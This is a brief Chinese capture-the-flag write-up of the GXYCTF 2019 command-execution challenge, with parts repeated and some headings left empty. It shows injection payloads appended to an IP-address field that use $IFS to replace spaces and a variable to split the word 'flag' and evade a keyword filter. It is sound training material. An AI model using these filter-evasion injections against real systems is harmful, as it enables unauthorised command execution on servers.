GXYCTF 2019 | 命令执行 | 空格绕过 | WAF绕过
题目
发现被骂了,尝试空格绕过
$FIS$1 {$IFS}
不行
尝试加上\ 斜杠绕过不行
怀疑flag关键字被过滤了
127.0.0.1;a=g;cat$IFS$1fla$a.php
发现成功执行,但是没有看到flag
看看有没有在源码中
其它方法补充
一
二
题目
发现被骂了,尝试空格绕过
$FIS$1 {$IFS}
不行
尝试加上\ 斜杠绕过不行
怀疑flag关键字被过滤了
127.0.0.1;a=g;cat$IFS$1fla$a.php
发现成功执行,但是没有看到flag
看看有没有在源码中
浙公网安备 33010602011771号